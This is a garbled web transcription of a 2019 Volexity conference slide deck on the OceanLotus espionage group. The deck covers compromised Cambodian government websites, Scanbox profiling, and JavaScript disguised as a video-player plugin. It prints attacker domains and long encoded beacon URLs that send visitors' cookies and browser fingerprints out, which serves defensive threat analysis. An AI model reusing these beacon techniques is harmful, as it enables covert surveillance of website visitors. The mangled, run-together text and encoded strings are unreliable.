OceanLotus Digital Surveillance And Cyberespionage At Scale PDF Free Download

2y ago

62 Views

1 Downloads

1.80 MB

32 Pages

Report/dmca

Download PDF

Transcription

Volexity Cyber SessionsSeptember 2019OceanLotusDigital Surveillance and Cyberespionage at ScaleSteven Adair VolexityVolexity Cyber Sessions Reston, VA September 25, 2019 Volexity Inc.1Background§ In May 2015, Chinese cybersecurity company Qihoo 360releases a report on a threat group they call OceanLotus.§ Report detailed targeted attacksagainst Chinese government agencies,maritime institutions, researchorganizations, and shippingenterprises since 2012.§ Attacks are described asstate-sponsored, but no nation namedas a likely culprit. Volexity Inc.22 Volexity Inc.1

Volexity Cyber SessionsSeptember 2019OceanLotus & Mac Malware§ In the initial report from Qihoo 360, references to Macmalware were made.§ In February 2016, samples were publicly analyzed byresearchers at AlienVault, revealing advanced malwarecapabilities targeting OS X.§ The malware is identified as having several encryptionroutines, anti-debugging capabilities, and built-incapabilities to support executing commands andapplications, terminating processes, removing files, etc.Ref: to-be-an-adobe-flashupdate Volexity Inc.33OceanLotus Vietnamese?§ In May 2017, FireEye publishes a blog describing several newOceanLotus spear phishing messages, malicious attachments,and backdoors.‣ Multiple new backdoors with different capabilities and command andcontrol protocols are detailed.§ FireEye describes several targets and victims of OceanLotuscampaigns that have a theme in common:‣ Not Vietnamese‣ Have business or other interests specifically pertaining to Vietnam§ OceanLotus effectively outed/named as being a VietnameseAPT group.‣ The blog also tied OceanLotus to an EFF blog from 2014 whereVietnamese activists/bloggers were targeted with malware.Ref: 05/cyber-espionage-apt32.html Volexity Inc.44 Volexity Inc.2

Volexity Cyber SessionsSeptember 2019Massive Tracking Campaign Uncovered§ In November 2017, Volexityreleases blog describingmassive OceanLotus spyingcampaign.§ Strategic Web Compromisedsites:‣ Chinese Shipping/Oil‣ LA / KH / PH Government‣ VN / US / etc. HumanRights/NGO (with VietnameseFocus) Volexity Inc.55The Next Wave of OceanLotusThe Accidental Discovery of Mass Surveillance Volexity Inc.6 Volexity Inc.3

Volexity Cyber SessionsSeptember 2019Scanbox!§ On a nice spring day in 2017, we received a Scanbox alertfrom a customer’s web browsing activity.§ Quick intro or refresher on Scanbox.‣ PHP and JavaScript framework designed to profile and “exploit”visitors of a website‣ Has multiple plugins that support examining the browser,browser plugins, installed software, and report various details‣ Also has keylogger functionality (see our Virtual PrivateKeylogging blog)§ Scanbox is primarily used by Chinese APT groups.7 Volexity Inc.7MFAIC Cambodia§ Examination of the alert reveals two key items:‣ Alert is being triggered for connections back to the domainajax-js[.]com‣ Referring (compromised) URL is from www.mfaic.gov[.]kh The Ministry of Foreign Affairs and International Cooperation in Cambodia§ Scanbox in the wild is always interesting to see.‣ Threat actor has breached MFAIC and installed Scanbox‣ Further targeting organizations that would visit Cambodian MFAwebsite Volexity Inc.88 Volexity Inc.4

Volexity Cyber SessionsSeptember 2019Scanbox in ect.min.js?ver 2.0 Volexity Inc.99Earlier Activity and New Investigations§ Just two weeks earlier, we had identified a differentScanbox URL on the website of the Ministry of the Interior(www.interior.gov.kh).‣ 5.104.105.194/adminxx5xx/§ Start proactively taking a look at KH Governmentwebsites ‣ The Ministry of Foreign Affair (MFA) – www.mfa.gov.kh‣ The findings were. interesting Volexity Inc.1010 Volexity Inc.5

Volexity Cyber SessionsSeptember 2019Directory Listing On and Interesting Files11 Volexity Inc.1164-bit Binaries - Leviathan/GreenCrew/APT 40File Name : cript.datDirectory : .File Size : 26 kBFile Modification Date/Time : 2017:05:1202:06:49-04:00File Access Date/Time : 2018:02:2618:36:31-05:00File Inode Change Date/Time : 2017:06:2101:05:24-04:00File Permissions : rw-r--r-File Type : Win64 EXEMIME Type : application/octet-streamMachine Type : AMD AMD64Time Stamp : 2014:09:01 04:00:24-04:00PE Type : PE32 Volexity Inc. strings -e l msbuild.log%s\*%s\%scmd.exesvchost.exekernel32%d %d.%d.%d %s%d Core %.2f GHz%.2f GBnull[Green] pid %d tid %d modulePath %s modulePath modulePath %[ ]1212 Volexity Inc.6

Volexity Cyber SessionsSeptember 2019Interesting JavaScript File§ Closer look at the file /jwplayer.js reveals:§ Obfuscated JS that loads more JS from the following URL:‣ http://s.jscore-group.com/js/jwp.js Volexity Inc.1313Examining HTTP Activity§ The JS was designed to blend in and look like it is alegitimate part of the website’s JW Player plugin.§ Pulled all related traffic from system accessing the KHMFA website.§ Request for jwp.js showed the file was pretty large –approximately 48 KB.§ Network traffic showed follow-on HTTP requests that wereparticularly interesting. Volexity Inc.1414 Volexity Inc.7

Volexity Cyber SessionsSeptember 2019HTTP Activity Cont’d§ A follow on URL from s.jscore-group.com was requested:https://health-ray-id.com/robot.txt‣ Text file with a constantly changing GUID value. Example:2223f4b74d-5db0-40a7-8755-bf1d257aa513§ Followed by a few more interesting requests IyJTNBJTIyJTIyJTdE/adFeedback.js Volexity Inc.1515Next Requesthttp://s.jscoregroup.com /sync/JTdCJ2IyaGlzdG9yeSUyM iUzQ SU3Q iUyM m NsaW VudF90aXRsZSUyM iUzQ SUyM iV1M Tc4M CV1M TdEM iV1M Tc5Q SV1M Tc5RiV1M TdCRCV1M Tc4NCV1M Tc4M CV 1YTdCNiV1M Tc5Q SV1M Tc5NCV1M Tc5Q SV1M Tc5M SV1M TdDM SV1M Tc5RiUyM CV1M Tc5M yV1M TdCNyV1M Tc4NCV1M TcM RiV1M TdBM CV1M Tc5NCV1M TdPM iV1M Tc5Q SV1M Tc4RiV1M TdCNyV1M Yc5NCV1MTc4RiV1M TdEM iV13Tc4RiV1M TdCNyV1M Tc4M CV1M TdCNiV1M Tc5Q SV1M TdBM iV1M Tc5M yV1M TdEM iV1M Tc4RiV1M Tc5Q SV1M Tc4NyV1M TdCNiV1M Tc4RiV1M TdCNyUyM CV1M Tc5M yV1M TdCNyV1M Tc4NCV1M Tc5RiV1M TdEM iV1M Tc5M CV1M TdCNiV1M Tc5M yV1M Tc4RiV1M TdDNiV1M Tc4RSV1M TdCNiV1M Tc4NCV1M Tc4M CV1M Tc5O CV1M TdEM iV1M Tc5NiV1M TdCQ iV1M Tc4NyV1M TdCNiUyM CV1M Tc4NyV1M TdCRCV1M Tc5O SV1M Tc5RiV1M Tc4NCV1M TdEM iV1M Tc5Q SV1M TdEM iV1M Tc4M iV1M TdDNCV1M TdDNAV1M Tc5NiV1M Tc5Q iV1M Tc5Q SV1M Tc4 Q SV1M TdEM nV1M Tc4Q iV1M Tc4M SV1M TdEM iV1M bc5O CV1M TdDM iV1M Tc5Q SUyM CV1M TdFNSV1M TdFNyV1M TdFO CUyM CV1M Tc5M yV1M TdCNiV1M Tc4M CV1M TdDQ RUyM CV1M Tc4M CV1M TdEM iV1M Tc5M yV1M TdCQ iV1M Tc4NCV1M Tc5RSV1M Tc5O SV1M TdD2CV1M Tc5NiV1M TdDM SV1M Tc5Q iUyM CV1M TdFO SUyM CV1M Tc4M SV1M TdDM iUyM CV1M Tc4Q SV1M TdCRSV1M Tc5O CV1M Tc4NiV1M TdEM iV1MTc5M yV1M TdCNiV1M TdDNiUyM CV1M TdFM iV1M TdFM CV1M TdFM SV1M TdFNiUyM iUyQ yUyM m NsaW VudF91cm w lM jIlM 0ElM jJodHRw JTNBLy93d3cubW ZhLm dvdi5raC8lM 0Zw YW dlJTNEZGV0YW lsJTI2Y3R5cG UlM 0RhcnRpY2xlJTI2aW Q lM 0Q xO TY4JTI2bG clM 0RlbiUyM iUyQ yUyM m NsaW VudF9jb29raW UlM jIlM 0ElM jJQ SFBTRVNTSUQ lM 0RrNTgyZjM zYm Y4M DM w ZW VlM jY1O G M 5YzYyNjM yN2NkYSUzQ iUyM F9fYXR1dm M lM 0Q xJTI1N0M yM SUzQ iUyM F9fYXR1dnM lM 0Q 1O TI0M jRjO DFm YTkzZm Y5M DAw JTNCJTIw X19hdHNzYyUzRG dvb2dsZSUyNTNCM SUzQ iUyM scFkyc3VZM jl0W W 5Kdm Q zTm xjaTFsZUhSbGJuTnBiM jR1YW 1SbW EyM XBZV0pxJTIyJTJDJTIyY2xpZW 50X2hhc2glM jIlM 0ElM jIlM jIlM kM lM jJjbGllbnRfcm Vm ZXJyZXIlM jIlM 0ElM jJodHRw cyUzQ S8vd3d3Lm dvb2dsZS5jb20vJTIyJTJDJTIyY2xpZW 50X3BsYXRm b3JtX3VhJTIyJTNBJTIyTW 96aW xsYS81LjAlM jAlM jhXaW 5kb3dzJTIw TlQ lM jAxMC4w JTNCJTIw V09XNjQ lM jklM jBBcHBsZVdlYktpdC81M zcuM zYlM jAlM jhLSFRNTCUyQ yUyM G xpa2UlM jBHZW NrbyUyO SUyM ENocm 9tZS81O C4w LjM w M jkuM TEw JTIw U2Fm YXJpLzUzNy4zNiUyM iUyQ yUyM m NsaW VudF90aW 1lJTIyJTNBJTIyM jAxO y0w NS0yM 1Q xM iUzQ TAyJTNBM TcuO DkxW iUyM iUyQ yUyM nRpbW V6b25lJTIyJTNBJTIyQ W 1lcm ljYS9O ZXdfW W 9yayUyM iUyQ yUyM m NsaW VudF9uZXR3b3JrX2lw X2xpc3Q lM jIlM 0ElNUIlM jIxO TIuM TY4Ljgw LjIw NCUyM iU1RCUyQ yUyM m NsaW VudF9hcG klM jIlM 0ElM jIw M DcKM DAyZTAw Nm Ew M DczM D A2M zAw Nm Yw M DcyM DA2NTAw M m Q w M DY3M DA3M jAw Nm Yw M Dc1M DA3M DAw M m Uw M DYzM DA2ZjAw Nm Q lM jIlM kM lM jJjbGllbnRfdXVpZCUyM iUzQ SUyM jdkM m Q 3Y2U0N2RkM TdhZW JhZW U5M jhhM m JjM W Fm M Dk1JTIyJTJDJTIyY2xpZW 50X3p1dW lkJTIyJTNBJTIyM jNm NGI3NGQ tNW RiM C00M GE3LTg3NTUtYm YxZDI1N2FhNTEzJTIyJTJDJTIyZHVyaW 5nJTIyJTNBJTdCJTIyaGlzdG 9yeSUyM iUzQ TI3O TclM kM lM jJ3ZW JydGM lM jIlM 0ElNUIyNzk1JTVEJTdEJTdEJTJDJTIybm F2aW dhdG9yJTIyJTNBJTdCJTIydXNlckFnZW 50JTIyJTNBJTIyTW 96aW xsYS81LjAlM jAlM jhXaW 5kb3dzJTIw TlQ lM jAxM C4w JTNCJTIwV09XNjQ lM jklM jBBcHBsZVdlYktpdC81M zcuM zYlM jAlM jhLSFRNTCUyQ yUyM Gxpa2UlM jBHZW NrbyUyO SUyM ENocm 9tZS81O C4w LjM w M jkuM TEw JTIw U2Fm YXJpLzUzNy4zNiUyM iUyQ yUyM m Fw cFZlcnNpb24lM jIlM 0ElM jI1LjAlM jAlM jhXaW 5kb3dzJTIw TlQ lM jAxM C4w JTNCJTIw V09XNjQ lM jklM jBBcHBsZVdlYktpdC81M zcuM zYlM jAlM jhLSFRNTCUyQ yUyM Gxpa2xlM jBHZW NrbyUyO SUyMENocm 9tZS81O C4w LjM w M jkuM TEw JTIw U2Fm YXJpLzUzNy4zNiUyM iUyQ yUyM m Fw cENvZGVO YW 1lJTIyJTNBJTIyTW 96aW xsYSUyM iUyQ yUyM m Fw cE5hbW UlM jIlM 0ElM jJO ZXRzY2Fw ZSUyM iUyQ yUyM nBsYXRm b3JtJTIyJTNBJTIyV2luM zIlM jIlM kM lM jJw cm 9kdW N0JTIyJTNBJTIyR2Vja28lM jIlM kM lM jJw cm 9kdW N0U3ViJTIyJTNBJTIyM jAw M zAxM DclM jIlM kM lM jJtYXhUb3VjaFBvaW 50cyUyM iUzQ TAlM kM lM jJsYW 5ndW FnZSUyM iUzQ SUyM m VuLVVTJTIyJTJDJTIybGFuZ3VhZ2VzJTIyJTNBJTVCJTIyZW 4tVVM lM jIlM kM lM jJlbiUyM iU1RCUyQ yUyM m RvTm 90VHJhY2slM jIlM 0FudW xsJTJDJTIyY29va2llRW 5hYm xlZCUyM iUzQ XRydW UlM kM lM jJ2ZW 5kb3IlM jIlM 0ElM jJHb29nbGUlM jBJbm M uJTIyJTJDJTIydm VuZG9yU3ViJTIyJTNBJTIyJTIyJTJDJTIyb25M aW 5lJTIyJTNBdHJ1ZSUyQ yUyM m hhcm R3YXJlQ 29uY3Vycm VuY3klM jIlM 0E4JTJDJTIycGx1Z2lucyUyM iUzQ SU3Q iUyM m FjdGl2ZXglM jIlM 0Fm YW xzZSUyQ yUyM m Nv0nM lM jIlM 0F0cnVlJTJDJTIyZm xhc2glM jIlM 0Fm YW xzZSUyQ yUyM m phdm ElM jIlM 0Fm YW xzZSUyQ yUyM m ZveG l0JTIyJTNBZm Fsc2UlM kM lM jJw aG 9uZW dhcCUyM iUzQ W ZhbHNlJTJDJTIycXVpY2t0aW 1lJTIyJTNBZm Fsc2UlM kM lM jJyZW FscGxheW VyJTIyJTNBZm Fsc2UlM kM lM jJzaW x2ZXJsaW dodCUyM iUzQ W ZhbHNlJTJDJTIydG91Y2glM jIlM 0Fm YW xzZSUyQ yUyM nZic2NyaXB0JTIyJTNBZm Fsc2UlM kM lMjJ2bG M lM jIlM 0Fm YW xzZSUyQyUyM ndlYnJ0YyUyM iUzQ XRydW UlM kM lM jJ3bXAlM jIlM 0Fm YW xzZSU3RCUyQ yUyM l9zY3JlZW 4lM jIlM 0ElN0IlM jJ3aW R0aCUyM iUzQ TE1M zYlM kM lM jJoZW lnaHQ lM jIlM 0E4NjQ lM kM lM jJhdm FpbFdpZHRoJTIyJTNBM TUXNiUyQ yUyM m F2YW lsSGVpZ2h0JTIyJTNBO DI0JTJDJTIycm Vzb2x1dGlvbiUyM iUzQ SUyM jE1M zZ4O DY0JTIyJTdEJTJDJTIyX3BsdW dpbnM lM jIlM 0ElNUIlN0IlM jJkZXNjcmlw dG lvbiUyM iUzQ SUyM kVuYW JsZXM lM jBXaW Rldm luZSUyM G xpY2Vuc2VzJTIw Zm 9yJTIw cG xheW JhY2slM jBvZiUyM EhUTUw lM jBhdW Rpby92aW RlbyUyM G 2vbnRlbnQ uJTIw JTI4dm Vyc2lvbiUzQ SUyM DEuNC44Ljk3M CUyO SUyM iUyQ yUyM m ZpbGVuYW 1lJTIyJTNBJTIyd2lkZXZpbm VjZG1hZGFw dGVyLm RsbCUyM iUyQ yUyM m xlbm d0aCUyM iUzQ TElM kM lM jJuYW 1lJTIyJTNBJTIyV2lkZXZpbm UlM jBDb250ZW 50JTIw RGVjcnlw dGlvbiUyM E1vZHVsZSUyM i13RCUyQ yU3Q iUyM m Rlc2NyaXB0aW 9uJTIyJTNBJTIyJTIyJTJDJTIyZm lsZW 5hbW UlM jIlM 0ElM jJtaGpm Ym 1kZ2Nm am JicGFlb2pvZm 9ob2Vm Z2llaGphaSUyM iUyQ yUyM m xlbm d0aCUyM iUzQ TElM kM lM jJuYW 1lJTIyJTNBJTIyQ 2hyb21lJTIw UERGJTIw Vm lld2VyJTIyJTdEJTJDJTdCJTIyZGVzY3JpcHRpb24lM jIlM 0ElM jIlMjIlM kM lM jJm aW xlbm FtZSUyM iUzQ SUyM m ludGVybm FsLW 5hY2w tcGx132luJTIyJTJDJTIybGVuZ3RoJTIyJTNBM iUyQ yUyM m 5hbW UlM jIlM 0ElM jJO YXRpdm UlM jBDbGllbnQ lM jIlN0Q lM kM lN0IlM jJkZXNjcm lw dGlvbiUyM iZzQ SUyM lBvcnRhYm xlJTIw RG9jdW 1lbnQ lM jBGb3JtYXQ lM jIlM kM lM jJm aW xlbm FtZSUyM iUzQ SUyM m ludGVybm FsLXBkZi12aW V3ZXIlM jIlM kM lM jJsZW 5ndGglM jIlM 0ExJTJDJTIybm FtZSUyM iUzQ SUyM kNocm 9tZSUyM FBERiUyM FZpZXdlciUyM iU3RCU1RCUyQ yUyM l9taW 1lVHlw ZXM lM jIlM 0ElNUIlN0IlM jJkZXNjcm lw dGlvbiUyM iUzQ SUyM ldpZGV2aW 5lJTIw Q 29udGVudCUyM ERlY3J5cHRpb24lM jBNb2R1bGUlM jIlM kM lM jJzdW Zm aXhlcyUyM iUzQ SUyM iUyM iUyQ yUyM nR5cGUlM jIlM 0ElM jJhcHBsaW NhdGlvbi94LXBw YXBpLXdpZG V2aW 5lLW NkbXUyM iU3RCUyQ yU3Q iUyM m Rlc2NyaXB0aW 9uJTIyJTNBJTIyJTIyJTJDJTIyc3Vm Zm l4ZXM lM jIlM 0ElM jJw ZG YlM jIlM kM lM jJ0eXBlJTIyJTNBJTIyYXBw bG ljYXRpb24vcGRm JTIyJTdEJTJDJTdCJTIyZGVzY3JpcHRpb24lM jIlM 0ElM jJO YXRpdm UlM jBDbGllbnQ lM jBFeGVjdXRhYm xlJTIyJTJDJTIyc3Vm Zm l4ZXM lM jIlM 0ElM jIlM jIlM kM lM jJ0eXBlJTIyJTNBJTIyYXBw bGljYXRpb24veC1uYW NsJTIyJTdEJTJDJTdCJTIyZG VzY3JpcHRpb24lM jIlM 0ElM jJQ b3J0YW JsZSUyM E5hdG l2ZSUyM ENsaW VudCUyM EV4ZW N1dG FibG UlM jIlM kM lM jJzdW Zm aXhlcyUyM iUzQ SUyM iUyM iUyQ yUyM nR5cGUlM jIlM 0ElM jJhcHBsaW NhdGlvbi94LXBuYW NsJTIyJTdEJTJDJTdCJTIyZGVzY3JpcHRpb24lM jIlM 0ElM jJQ b3J0YW JsZSUyM ERvY3VtZW 50JTIw Rm 9ybW F0JTIyJTJDJTIyc3Vm Zm l4ZXM lM jIlM 0El2jJw ZGYlM jIlM kMlM jJ0eXBlJTIyJTNBJTIyYXBw 2G ljYXRpb24veC1nb29nbG UtY2hyb21lLXBkZiUyM iU3RCU1RCU3RCU3RB /im g blank.gif Volexity Inc.1616 Volexity Inc.8

Volexity Cyber SessionsSeptember 2019URLs§ Yes that last URL was as crazy as it looks.§ Turns out all of this JavaScript is formulating URLs full ofbase64.§ Let’s decode them ‣ First URL -8755bf1d257aa513%22%2C%22hash%22%3A%22%22%7D Volexity Inc.1717Long URL %3Afalse%7D%2C%22 2 D%5D%2C%22 ication/x-google-chrome-pdf%22%7D%5D%7D%7D Volexity Inc.1818 Volexity Inc.9

Volexity Cyber SessionsSeptember 2019Cleaned Up","appVersion":"5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like pt":false,"vlc":false,"webrtc":true,"wmp":false}," 36,"availHeight":824,"resolution":"1536x864"}," plugins":[{"description":"Enables Widevine licensesfor playback of HTML audio/video content. r.dll","length":1,"name":"Widevine Content :"Chrome description":"Portable Document ,"name":"Chrome PDF Viewer"}]," mimeTypes":[{"description":"Widevine ContentDecryption type":"application/pdf"},{"description":"Native n/x-nacl"},{"description":"Portable Native n/x-pnacl"},{"description":"Portable on/x-google-chrome-pdf"}]}} Volexity Inc.1919More URLs§ A few more similar URLs are accessed to send back information,including the following:http://s.jscoregroup[.]com /sync/JLdCJTIyaG lzdG 9yeSUyM iUzQ SU3Q iUyM m NsaW VudF90aXRsZSUyM iUzQ SUybiV1M Tc4M CV1M TdEM iV1M Tc5Q SV1M Tc5RiV1M TdCRCV1M Tc4NCV1M Tc4M CV1M TdCNiV1M Tc5Q SV1M Tc5NCV1M Tc5Q SV1M Tc5M SV1M TdDM SV1M Tc5RiUyM CV1M Tc5M yV1ZZdCNyV1M Tc4NCV1M Tc5RiV1M TdBM CV1M Tc5NCV1M TdEM iV1M Tc5Q SV1M Tc4RiV1M TdCNyV1M Tc5NCV1M Tc4RiV1M TdEM iV1Dpc4RiV1M TdCNyV1M Tc4M CV1M TdCNiV1M Tc5Q SV1M TdBM iV1M Tc5xyV1M TdEM iV1M Tc4RiV1M Tc5Q SV1M Tc4NyV1M TdCNiV1M 2c4RiV1M TdCNyUyM CV1M Tc5M yV1M TdCNyV1M Tc4NCV1M Tc5RiV1M TdEM iV1M Tc5M CV1M TdCNiV1M Tc5M yV1M Tc4RiV1M TdDNiV1M Tc4RSV1M TdCNiV1M Tc4NCV1M Tc4M CV1M Tc5O CV1M TdEM iV1M Tc5NiV1M TdCQ iV1M Tc4NyV1M TdCNiUyM CV1M Tc4NyV1XTdCRCV1M Tc5O SV1M Tc5RiV1M Tc4NCV1M TdEM iV1M Tc5Q SV1M TdEM iV1M Tc4M iV1M TdDNCV1M TdDNyV1M Tc5NiV1M Tc5Q iV1M Tc5Q SV1M Tc4Q SV1M TdEM iV1M Tc4Q iV1M Tc4M SV1M TdEM iV1M Tc5O CV1M TdDM iV1M Tc5Q SUyM CV1M TdFNSV1M TdFNyV1M TdFO CUyM CV1M Tc5M yV1M TdCNiV1M Tc4M CV1M TdDQ iUyM CV1M Tc4M CV1M TdEM iV1M Tc5M yV1M TdCAiV1M Tc4NCV1M Tc5Q SV1M Tc5O SV1M TdDO CV1M Tc5NiV1M TdDM SV1M Tc5Q iUyM CV1M TdFO SUyM CV1M Tc4M SV1M TdDM iUyM CV1M Tc4Q SV1M TdCRSV1M Tc5O CV1M Tc4NiV1M TdEM iV1M Tc5M yV1M TdCNiV1M TdDNiUyM CV1M TdFM iV1M TdFM CV1M TdFM SV1M TdFNiUyM iUyQ yUyM m NsabVudF91cm w lM jIlM 0ElM jJodHRw JTNBLy93d3cubW ZhLm dvdi5raC8lM 0Zw YW dlJTNEZG V0YW lsJTI2Y3R5cG UlM 0RhcnRpY2xlJTI2aW Q lM 0Q xO TY4JTI2bG clM 0RraCUyM iUyQ yUyM m NsaW VudF9jb29raW UlM jIlM 0ElM jJQ SFBTRVNTSUQ lM 0RiNTgyZjM zYm Y4M DM w ZW VlM jY1O G M 5YzYyNjM yN2NkYSU0dQ iUyM F9fYXRzc2M lM 0Rnb29nbG UlM jUzQ jElM 0IlM jBfX19BUElTSUQ lM 0Q 3ZDJkN2NlNDdkZDE3YW ViYW VlO TI4YTJiYzFhZjA5NSUzQ iUyM F9fYXR1dm M lM 0Q yJTI1N0M yM SUzQ iUyM F9fYXR1dnM lM 0Q 1O TI0M jRjO DFm xTkzZm Y1M DDAxJTNCJTIw U0FQ SVNfSUQ lM 0RjR1pxW VdO cFptTnRhV2htW kdw b2NHNXFjR2xw W TJzdVkyO XRZbkp2ZDNO bGNpM W xlSFJsYm 5O cGIyNHVhbV1tYTIxcFlXSnElM jIlM kM lM jJjbGllbnRfaGFzaCUyM iUzQ SUyM iUyM iUyQ yUyM m NsaW VudF9yZW ZlcnJlciUyM iUzQ SUyM m h0dHAlM 0EvL3d3dy5tZm EuZ292Lm toLyUzRnBhZ

‣Has multiple plugins that support examining the browser, browser plugins, installed software, and report various details ‣